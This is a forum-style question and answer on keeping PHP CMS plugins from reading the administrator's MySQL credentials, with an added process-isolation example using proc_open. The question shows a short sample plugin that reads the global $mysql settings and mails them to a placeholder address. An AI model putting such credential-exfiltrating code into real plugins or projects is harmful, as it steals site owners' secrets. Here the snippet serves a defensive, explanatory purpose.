I have a question which has been bouncing in my mind for a long, long time.
I’m on a CMS project and I really don’t know how to do this:
I want this CMS to be mod-able by using a plugin system, nothing difficult until now.
Well, I now have this question: how can I protect a variable/constant like the MySQL password of the administrator user?
For example, in the file settings.php I have
$mysql = array("user" => "admin"...);
How can I make a class not to read it?
A simple class (plugin) could do
class myplugin extends plugin_container {
    // Reads the host's global $mysql settings and mails them out
    function badfunction() {
        mail("my bad address", "data stolen", $GLOBALS["mysql"]);
    }
}
A simple plugin, in this way, can steal the user’s sensitive data. How can I fix this?
You can’t really do this in PHP. You can put the variable in an object, make it private, but using Reflection, other code can get it as well. Hell, even if it couldn’t, there are still ways to get an object’s internals when you shouldn’t, like var_dump, debug_zval_dump, and more. I would suggest either:
Generally, when your code runs in some context (like in a PHP script) and you want to allow some module or plug-in to run in the same context, there is no way to hide anything. The plugin will have access to the same memory (all the variables), all open resources (database connections) and it will basically be indistinguishable from any other code in that context. The same applies to many other contexts, e.g. a native process running in an OS. Of course you can make it “harder” to get some variable or resource, but you can never ensure it can’t be accessed. Unless you run the other code in a different context (other process, virtualization, …).
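The "other process" option from the answer above, as an added example that is not part of the original thread: the host keeps `$mysql` in its own memory and runs the plugin in a separate PHP process, exchanging only JSON over pipes. The helper name `run_plugin_isolated`, the sample plugin and the placeholder password are constructed for illustration; it assumes a PHP 8 CLI on a Unix-like system.

```php
<?php
// Host process: the credentials exist only in this process's memory.
$mysql = ['user' => 'admin', 'password' => 'constructed-placeholder'];

// Constructed sample plugin, written to a temp file so the example is self-contained.
$plugin = tempnam(sys_get_temp_dir(), 'plg');
file_put_contents($plugin, <<<'PHP'
<?php
$in = json_decode(stream_get_contents(STDIN), true);
echo json_encode([
    'title'       => strtoupper($in['title']),
    'sees_mysql'  => isset($GLOBALS['mysql']),   // host globals are not visible here
    'env_entries' => count(getenv()),            // only what the host chose to pass
]);
PHP);

// Hypothetical helper: run one plugin file in its own PHP process.
function run_plugin_isolated(string $file, array $input): array
{
    // stdin/stdout are pipes; stderr is discarded so the child cannot block on it.
    $spec = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['file', '/dev/null', 'w']];
    // Array command: no shell is involved. PHP_BINARY assumes the CLI SAPI;
    // under a web SAPI, point this at the CLI binary instead.
    $cmd = [PHP_BINARY, '-n', $file];
    // Explicit environment, so secrets in the host's environment are not inherited.
    $env = ['PATH' => '/usr/bin:/bin'];
    $proc = proc_open($cmd, $spec, $pipes, sys_get_temp_dir(), $env);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start plugin process');
    }
    fwrite($pipes[0], json_encode($input));
    fclose($pipes[0]);
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    $code = proc_close($proc);
    $result = json_decode($out, true);
    if ($code !== 0 || !is_array($result)) {
        throw new RuntimeException("plugin failed (exit $code)");
    }
    return $result;
}

// Only the data the plugin needs crosses the process boundary.
var_dump(run_plugin_isolated($plugin, ['title' => 'hello']));
unlink($plugin);
```

This keeps the host's variables, open database connections and environment out of the plugin's reach, but a child running under the same OS account can still read settings.php from disk. The plugin process therefore also needs to run as an account that has no read permission on that file.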